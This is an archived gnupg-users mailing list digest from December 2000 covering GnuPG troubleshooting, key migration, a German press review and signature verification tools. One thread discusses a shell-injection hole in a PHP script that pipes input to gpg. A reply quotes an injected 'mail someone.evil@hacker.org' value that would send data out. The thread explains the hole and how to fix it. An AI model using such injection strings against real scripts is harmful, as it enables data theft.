gpg: pub 1024D/917FD74E 2000-12-03 asgq_ gpg: key has been created 10356 seconds in future (time warp or clock problem) gpg: key 917FD74E: invalid self-signature gpg: key has been created 10356 seconds in future (time warp or clock problem) gpg: key 917FD74E: invalid subkey binding gpg: key 917FD74E: skipped user ID 'asgq_ ' gpg: key 917FD74E: skipped subkey gpg: key 917FD74E: no valid user IDs gpg: this may be caused by a missing self-signature gpg: Total number processed: 1 gpg: w/o user IDs: 1 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Sat Dec 2 23:08:05 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Sat, 2 Dec 2000 15:08:05 -0800 Subject: Solved : key has been created 10356 seconds in future Message-ID: <000901c05cb4$beeac720$01a800c0@derekvok> Ahhh jeez... sorry about that post. The clock was off on my computer. Derek -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From adler@bnl.gov Sun Dec 3 21:15:25 2000 From: adler@bnl.gov (Stephen Adler) Date: Sun, 3 Dec 2000 21:15:25 +0000 Subject: insecure memory Message-ID: <1001203211525.ZM22800@ssadler.phy.bnl.gov> I get a message saying that my memory is insecure when I use the gpg utility. What is it really complaining about, should I worry about this, and if so, is there a fix? Thanks. Steve. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 3 21:39:28 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 03 Dec 2000 21:39:28 GMT Subject: insecure memory In-Reply-To: <1001203211525.ZM22800@ssadler.phy.bnl.gov> References: <1001203211525.ZM22800@ssadler.phy.bnl.gov> Message-ID: <20001203213445.83D7.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Stephen Adler, On 03 December 2000, I received the following message from you regarding "insecure memory" SA> I get a message saying that my memory is insecure when I use the gpg SA> utility. What is it really complaining about, should I worry about this, SA> and if so, is there a fix? SA> SA> Thanks. Steve. Yes, I got this too (I run GnuPG under Win98). I ignored it, and nothing seems to have happened. Later I received word from another GnuPG user with Win98 that they did the same. Unless somebody can advise me differently, I'll continue to ignore it.... Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 03 December 2000 21:34:45 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - WinPT v0.0.3pre2 (WIN98) Comment: My PGP Key: 0x99DB10BD | My GPG Key: EB389C4E iEYEARECAAYFAjoqvXgACgkQtwKLKus4nE5XUgCgwGZHXUSPXkWv3Rqv3HGbXeNi W90An0GhfGjOUcN+gv1fqCvAwLfDrgnN =5k0I -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Sun Dec 3 22:33:15 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Sun, 3 Dec 2000 22:33:15 +0000 Subject: insecure memory In-Reply-To: <1001203211525.ZM22800@ssadler.phy.bnl.gov>; from adler@bnl.gov on Sun, Dec 03, 2000 at 09:15:25PM +0000 References: <1001203211525.ZM22800@ssadler.phy.bnl.gov> Message-ID: <20001203223315.A3504@mcdonald.org.uk> --VS++wcV0S1rZb1Fb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Dec 03, 2000 at 09:15:25PM +0000, Stephen Adler wrote: > I get a message saying that my memory is insecure when I use the gpg > utility. What is it really complaining about, should I worry about this, > and if so, is there a fix? On varies Unix varieties (including Linux) it is possible to lock memory so that it is never swapped out to disk. gnupg terms this 'secure memory'. Under Windows it is not possible to do this. If you are seeing this warning under an OS that does support it, it may be that you need to make the gnupg binary setuid root, since locking memory in this way is something that only root can do. Andrew --=20 Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ --VS++wcV0S1rZb1Fb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Ksor/LupyPLe7TYRAn+nAJ9lzKcHWPQbM+nmFwLk74QJCweA1wCeM8p7 AQsfz7p6647B6PaDsfuQJBI= =UpNE -----END PGP SIGNATURE----- --VS++wcV0S1rZb1Fb-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jfreeman@connix.com Mon Dec 4 01:45:58 2000 From: jfreeman@connix.com (Joshua S. Freeman) Date: Sun, 3 Dec 2000 20:45:58 -0500 (EST) Subject: newbie question Message-ID: I'm making the transition from being a macOS user to a Linux user. (Potato). I've been using/updating the free version of PGP for the mac for several years now. Thus, I have many pulic keys on my keychain and I already have my own private and public keys... Is there a pointer to simple directions on how to move my keyfiles from MacOS to linux or do I have to generate new keys? TIA, J. -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Joshua S. Freeman | preferred email: jfreeman@connix.com pgp public key: finger jfreeman@connix.com http://www.threeofus.com -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 4 02:55:52 2000 From: lists@wordit.com (Marcus) Date: Mon, 04 Dec 2000 03:55:52 +0100 Subject: Passphrase in Perl script? Message-ID: <200012040355520633.0142AF10@smtprelay.t-online.de> How do you send the passphrase (for symmetric encryption) in a Perl script on Windows (or in DOS batch file)? On Windows, pipes are not a (real) option, AFAIK, and I'm not sure you can pass DOS *.* results to gpg? I want to prompt the user for the passphrase once and then encrypt all files given a certain pattern. I did this in Perl, and currently, the user is prompted twice for every file. What I'm missing is how to send the passphrase in a variable to gpg. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From telegraph@gmx.net Mon Dec 4 21:20:03 2000 From: telegraph@gmx.net (Gregor Zattler) Date: Mon, 4 Dec 2000 22:20:03 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <20001204222003.A2384@safran.dialup.fu-berlin.de> Hi folks, this -- not very good -- article was published at September, 29th in the german newspaper "Die Welt" (the world). "Die Welt" is an very conservative newspaper with very god connections to german security apparatus (military, services and police). It favours gpg over pgp for security reasons. Sorry, no translation: -------------cut-------- Bestmögliche Verschlüsselung für E-Mails Alternative zum Klassiker PGP: Warum die Kryptographie-Software Gnu-PG besser als die Konkurrenz ist Von Marcus Höfer Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von offizieller Seite gibt es Unterstützung. So gehört beispielsweise das Bundeswirtschaftsministerium zu den Förderern des Programms. Tatsächlich hat eine E-Mail de facto den Status einer Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie sogar ohne Wissen von Absender und Empfänger verändern und an den Adressaten weiterleiten. Wer das verhindern will, muss ein Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen haben viele Anwender verschreckt. Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner Vorstellung als absolut sicheres System. Ist PGP beim Sender und Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail während des Transports vom Absender zum Empfänger verändert wurde, und liefert eine hochgradig sichere digitale Unterschrift. Das verwendete Verfahren zur Verschlüsselung bietet eine enorme Zahl von verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer Wert. Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, wodurch viele Anwender das Vertrauen in die Sicherheitssoftware verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass staatliche Organisationen wie zum Beispiel die US-Datenpolizei National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb schon lange davor, PGP blind zu vertrauen. Anders sieht es beim Gnu Privacy Guard aus. Das kostenlose Programm wird von vielen "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der gesamte Quelltext zur Verfügung stehen muss, können auch keine geheimen Hintertüren eingebaut werden. Erstmals wurde Gnu-PG vom Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und Sun-OS. (c) Die WELT online http://www.welt.de -------------cut again --------- Ciao, Gregor -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bruce_horton@hotmail.com Mon Dec 4 21:57:50 2000 From: bruce_horton@hotmail.com (Bruce Horton) Date: Mon, 04 Dec 2000 21:57:50 -0000 Subject: smaller GPG for signature checking only Message-ID: Hello All, I would like to use GPG to create a digital signature checker for a Linux based embedded system. Memory and program footprint are premium resources in that environment. I *ONLY* need to be able to check that a signed file is valid. No need for general purpose encryption or signing, etc... I checked the GPG accompanying documentation, the FAQ, and did WWW and Usenet searches to no avail. Does anyone know how to do this? Either prebuilt x86 binaries or Makefile settings would be fine. Please CC me on any responses as I am not subscribed to the newsgroup. Thanks, -Bruce Horton _____________________________________________________________________________________ Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 03:08:16 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Mon, 4 Dec 2000 19:08:16 -0800 Subject: possible security hole Message-ID: <000c01c05e68$c1667160$01a800c0@derekvok> I've created a php script which uses pipes in execting a shell such as: "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail to\@me.com" the script runs as nobody the secret key has never seen the server the script only encrypts I don't care who the message comes from I only want the $sensitiveinfo I was told that this is insecure (even if no one breaks root!). Could someone with more expertise PLEASE give me an opinion? p.s. I know that you are sick of these questions (thank you for your program and your patience Werner!) Thank you in advance Derek -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jhmartin@mail.com Tue Dec 5 01:05:32 2000 From: jhmartin@mail.com (Jason Martin) Date: Mon, 4 Dec 2000 17:05:32 -0800 (PST) Subject: possible security hole In-Reply-To: <000c01c05e68$c1667160$01a800c0@derekvok> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I believe posible exploits are if $sensitiveinfo contains things like "blah; mail someone.evil@hacker.org "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > to\@me.com" > > the script runs as nobody > the secret key has never seen the server > the script only encrypts > I don't care who the message comes from I only want the $sensitiveinfo - -- PGP KeyID=0xEA954813 Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 finger jhmartin@pitr.scs.wsu.edu for key -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org Filter: gpg4pine 4.1 (http://azzie.robotics.net) iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2 bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw== =xi3u -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 05:26:59 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Mon, 4 Dec 2000 21:26:59 -0800 Subject: possible security hole References: Message-ID: <000601c05e7b$fe8fd000$01a800c0@derekvok> thank you for your input. Could I bother you to "briefly" explain encoding to base64? ----- Original Message ----- From: "Jason Martin" To: "Derek Vokey" Cc: Sent: Monday, December 04, 2000 5:05 PM Subject: Re: possible security hole > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I believe posible exploits are if $sensitiveinfo contains things like > "blah; mail someone.evil@hacker.org shell can be tricked depending on $sensitiveinfo to do things you don't > intend. Maybe if you base64 encode $sensitiveinfo first you'll be > more-or-less immune from shell exploits. From a purely crypto point of > view; I don't see anything wrong with this if we assume that > $sensitiveinfo is guarenteed to have shell-safe values. > > - -Jason Martin > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > to\@me.com" > > > > the script runs as nobody > > the secret key has never seen the server > > the script only encrypts > > I don't care who the message comes from I only want the $sensitiveinfo > > - -- > PGP KeyID=0xEA954813 > Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 > finger jhmartin@pitr.scs.wsu.edu for key > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (GNU/Linux) > Comment: For info see http://www.gnupg.org > Filter: gpg4pine 4.1 (http://azzie.robotics.net) > > iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t > IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP > LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg > YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 > bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2 > bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw== > =xi3u > -----END PGP SIGNATURE----- > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sen_ml@eccosys.com Tue Dec 5 03:11:40 2000 From: sen_ml@eccosys.com (sen_ml@eccosys.com) Date: Tue, 05 Dec 2000 12:11:40 +0900 (JST) Subject: base 64 encoding pointers (was Re: possible security hole) In-Reply-To: <000601c05e7b$fe8fd000$01a800c0@derekvok> References: <000601c05e7b$fe8fd000$01a800c0@derekvok> Message-ID: <20001205.121140.46593049.sen_ml@eccosys.com> From: "Derek Vokey" Subject: Re: possible security hole Date: Mon, 4 Dec 2000 21:26:59 -0800 > Could I bother you to "briefly" explain encoding to base64? iirc, documentation for base64 can be found in the mime-related rfcs (let's take a look now...hmmm...yes, it appears that section 6.8 of rfc 2045 has a description). it's also mentioned in the openpgp rfc (rfc 2440) for obvious reasons. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jhmartin@mail.com Tue Dec 5 03:23:01 2000 From: jhmartin@mail.com (Jason Martin) Date: Mon, 4 Dec 2000 19:23:01 -0800 (PST) Subject: possible security hole In-Reply-To: <000601c05e7b$fe8fd000$01a800c0@derekvok> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >briefly explain encoding to base64 It takes binary (and text) input and uses A-Za-z0-9 and = to encode the data in one long string. It is equivalent to uuencoding. It is a clean way to bandy about 'dirty' strings. PHP has a function base64_encode() and base64_decode() to handle this. I recommend you encode the data as such before handing it off to gpg. Decoding can be done with any number of tools, one being 'mimencode -u' under linux. uudecode -m can probably do it too. > > shell can be tricked depending on $sensitiveinfo to do things you don't > > intend. Maybe if you base64 encode $sensitiveinfo first you'll be > > more-or-less immune from shell exploits. From a purely crypto point of > > view; I don't see anything wrong with this if we assume that > > $sensitiveinfo is guarenteed to have shell-safe values. > > > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear > me|mail > > > to\@me.com" > > > > > > the script runs as nobody > > > the secret key has never seen the server > > > the script only encrypts > > > I don't care who the message comes from I only want the $sensitiveinfo - -- Cats have nine lives - but sleep through eight of them. PGP KeyID=0xEA954813 Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 finger jhmartin@pitr.scs.wsu.edu for key -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org Filter: gpg4pine 4.1 (http://azzie.robotics.net) iQEMBAERAgDMBQI6LF+lnRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgT7UcAoJHzmzI87ipvjwg5 7cfk3HzHnK6CAJ47ZgBHMRCk26hKnLGbclOzV00Mrg== =2U4p -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 06:58:31 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 07:58:31 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002> > -----Ursprüngliche Nachricht----- > Von: Gregor Zattler [SMTP:telegraph@gmx.net] > Gesendet am: Montag, 4. Dezember 2000 22:20 > An: gnupg-users@gnupg.org > Betreff: Gnu-pg reviewed by german newspaper > > > Hi folks, > > this -- not very good -- article was published at September, > 29th in the german newspaper "Die Welt" (the world). "Die Welt" is an > very conservative newspaper with very god connections to german > security apparatus (military, services and police). It favours gpg > over pgp for security reasons. > > Sorry, no > translation: > > -------------cut-------- > > Bestmögliche Verschlüsselung für E-Mails > > Alternative zum Klassiker PGP: Warum die Kryptographie-Software > Gnu-PG besser als die Konkurrenz ist > > Von Marcus Höfer > > Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat > eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard > (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm > als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von > offizieller Seite gibt es Unterstützung. So gehört beispielsweise das > Bundeswirtschaftsministerium zu den Förderern des > Programms. Tatsächlich hat eine E-Mail de facto den Status einer > Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie > sogar ohne Wissen von Absender und Empfänger verändern und an den > Adressaten weiterleiten. Wer das verhindern will, muss ein > Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software > ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen > haben viele Anwender verschreckt. > > Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner > Vorstellung als absolut sicheres System. Ist PGP beim Sender und > Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch > Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail > während des Transports vom Absender zum Empfänger verändert wurde, und > liefert eine hochgradig sichere digitale Unterschrift. Das verwendete > Verfahren zur Verschlüsselung bietet eine enorme Zahl von > verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer > Wert. > > Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem > Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller > für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, > wodurch viele Anwender das Vertrauen in die Sicherheitssoftware > verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass > staatliche Organisationen wie zum Beispiel die US-Datenpolizei > National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines > Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb > schon lange davor, PGP blind zu vertrauen. Anders sieht es beim Gnu > Privacy Guard aus. Das kostenlose Programm wird von vielen > "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der > gesamte Quelltext zur Verfügung stehen muss, können auch keine > geheimen Hintertüren eingebaut werden. Erstmals wurde Gnu-PG vom > Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix > vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme > erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und > Sun-OS. > > > (c) Die WELT online > > http://www.welt.de > > > -------------cut again --------- > > Ciao, Gregor > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 07:33:29 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 08:33:29 +0100 Subject: possible security hole In-Reply-To: <000c01c05e68$c1667160$01a800c0@derekvok>; from turfdog@planetturf.ca on Mon, Dec 04, 2000 at 07:08:16PM -0800 References: <000c01c05e68$c1667160$01a800c0@derekvok> Message-ID: <20001205083329.A20381@gnupg.de> On Mon, 4 Dec 2000, Derek Vokey wrote: > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > to\@me.com" I don't know PHP, but I assume that you are using something like system(3) to this job. The problem is that you might be able to trick the shell in doing evil thing by having shell code in $seinsitiveinfo. Some possible solutions: * sanitize $sensitiveinfo by removing all characters except for digits, underscore, space and letters :-) * use fork/exec to run gpg * write the data to a temp string and feed it to gpg. * use something like popen(3) and feed it with $sensitiveinfo Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 07:34:10 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 08:34:10 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <51896D38E5E4D111BE560001FA68BA368456B3@SBO1002> Sorry, I just sent this to the list without adding my comments. I hate point-and-click user interfaces they facilitate everything, including shooting yourself in the foot %-) > Sorry, no > translation: Well, the least we could do is a brief summary. > -------------cut-------- > > Bestmögliche Verschlüsselung für E-Mails > > Alternative zum Klassiker PGP: Warum die Kryptographie-Software > Gnu-PG besser als die Konkurrenz ist > > Von Marcus Höfer Best possible encryption for e-mails. An alternative to classic PGP: why crypto-s/w GnuPG is better than the competition by Marcus Höfer. > Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat > eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard > (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm > als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von > offizieller Seite gibt es Unterstützung. So gehört beispielsweise das > Bundeswirtschaftsministerium zu den Förderern des > Programms. PGP has new competition in gpg. Security experts around the world call it one of the best encryption programs. There is also official support e.g. the grant from the german Ministry of Commerce. > Tatsächlich hat eine E-Mail de facto den Status einer > Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie > sogar ohne Wissen von Absender und Empfänger verändern und an den > Adressaten weiterleiten. Wer das verhindern will, muss ein > Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software > ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen > haben viele Anwender verschreckt. This explains the insecurity of e-mail and the need for encryption. It mentions PGP as the most popular tool and states that weaknesses found in PGP have deterred many of its users. > Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner > Vorstellung als absolut sicheres System. Ist PGP beim Sender und > Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch > Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail > während des Transports vom Absender zum Empfänger verändert wurde, und > liefert eine hochgradig sichere digitale Unterschrift. Das verwendete > Verfahren zur Verschlüsselung bietet eine enorme Zahl von > verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer > Wert. This explains that PGP is used to encrypt and sign e-mail. The system used provides a tremendous amount of possible keys. A number not breakable by current standards. > Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem > Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller > für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, > wodurch viele Anwender das Vertrauen in die Sicherheitssoftware > verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass > staatliche Organisationen wie zum Beispiel die US-Datenpolizei > National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines > Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb > schon lange davor, PGP blind zu vertrauen. This states that while PGP is provided as source code, there are some secrets that the distributor wants to keep. The ADK system is mentioned. The text also mentions the rumours about the NSA being able to use a back door. "Thus, security experts have been warning us against indiscriminately trusting PGP for quite some time." > Anders sieht es beim Gnu > Privacy Guard aus. Das kostenlose Programm wird von vielen > "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der > gesamte Quelltext zur Verfügung stehen muss, können auch keine > geheimen Hintertüren eingebaut werden. GnuPG is deifferent. Free of cost and constantly improved by hobbyist programmers. Due to the entire source code being available, there can be no back doors. > Erstmals wurde Gnu-PG vom > Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix > vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme > erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und > Sun-OS. GnuPG was introduced by WK in 1999 for Unix and has since become available for several platforms. > (c) Die WELT online > > http://www.welt.de > > > -------------cut again --------- Thanks, Gregor. I thought the article was rather vague on some of the issues. Not surprisingly, the general principles of public key encryption were glossed over. You would expect that in that short a text. But the ADK issue is adressed rather passingly, as compared to the back door rumors. The text was less than I would expect from a newspaper of "Die Welt"´s standing. Still, good advertisement, I guess. Again sorry for the previous post. Tschüß, Ralf -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 07:40:29 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 08:40:29 +0100 Subject: smaller GPG for signature checking only In-Reply-To: ; from bruce_horton@hotmail.com on Mon, Dec 04, 2000 at 09:57:50PM -0000 References: Message-ID: <20001205084029.B20381@gnupg.de> On Mon, 4 Dec 2000, Bruce Horton wrote: > I *ONLY* need to be able to check that a signed file is > valid. No need for general purpose encryption or signing, etc... since 1.0.4, gnupg comes with a tool named gpgv which does exactly what you want. It is smaller than gpg but still quite large. If you need a really slim verification tool, have a look at SFSV (ftp://ftp.guug.de/pub/members/wkoch/crypto/). This is a tool to OpenPGP sign an ELF file and embed the signature in the ELF file. The library part then can be used by the ELF loader to check that signature. It is not very fast but the memory footprint is about 18k. useful for embedded systems to check. It is GPLed; if you have problems with this, please contact me privately. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Tue Dec 5 12:34:07 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Tue, 5 Dec 2000 13:34:07 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 Message-ID: <00120513321202.18426@atlas> --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, yesterday i received the attached and pgp signed email. It has been signed by PGP 5.0i with the counterpart of the attached key. (I attached the key twice. The first one is the key Michael send me and the second one is Michael's public key reexported via GPG.) The problem is that PGP 5.0i and PGP 6.5.8 both tell me that the signature is good. But GPG 1.0.4 says the signature is bad. I looked in the FAQ, the HowTos, the GPH and the mailing list archive but I still got no clue. The only thing a remarked was that the output of PGP (both versions) is one byte (a LF) shorter than the output of GPG. But removing the last LF before "-----BEGIN PGP SIGNATURE" didn't help, although GPG then produced the same output as PGP. I also tried all available hash algorithms and --force-v3-sigs without success. Where is the problem? Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 